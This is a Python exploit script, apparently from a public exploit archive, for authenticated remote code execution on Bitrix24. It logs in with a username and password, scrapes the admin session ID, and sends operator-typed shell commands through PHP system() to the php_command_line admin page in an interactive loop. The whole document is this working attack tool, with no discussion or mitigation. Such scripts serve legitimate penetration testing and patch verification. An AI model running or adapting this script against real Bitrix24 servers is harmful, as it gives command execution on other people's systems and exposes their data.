# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated) # Date: 4/22/2022 # Exploit Author: picaro_o # Vendor Homepage: https://www.bitrix24.com/apps/desktop.php # Tested on: Linux os #/usr/bin/env python #Created by heinjame import requests import re from bs4 import BeautifulSoup import argparse,sys user_agent = {'User-agent': 'HeinJame'} parser = argparse.ArgumentParser() parser.add_argument("host", help="Betrix URL") parser.add_argument("uname", help="Bitrix Username") parser.add_argument("pass", help="Bitrix Password") pargs = parser.parse_args() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] inputcmd = input(">>") s = requests.Session() def login(): postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password} r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata) def getsessionid(): sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en", headers = user_agent) session = re.search(r"'bitrix_sessid':.*", sessionid.text) extract = session.group(0).split(":") realdata = extract[1].strip(" ") realdata = realdata.replace("'","") realdata = realdata.replace(",","") return realdata # print(r.text) def cmdline(cmd,sessionid): cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'} usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers = user_agent, data = cmdline) soup = BeautifulSoup(usercmd.content,'html.parser') cmd = soup.find('p').getText() print(cmd.rstrip()) login() sessionid = getsessionid() while inputcmd != "exit": cmdline(inputcmd,sessionid) inputcmd = input(">>")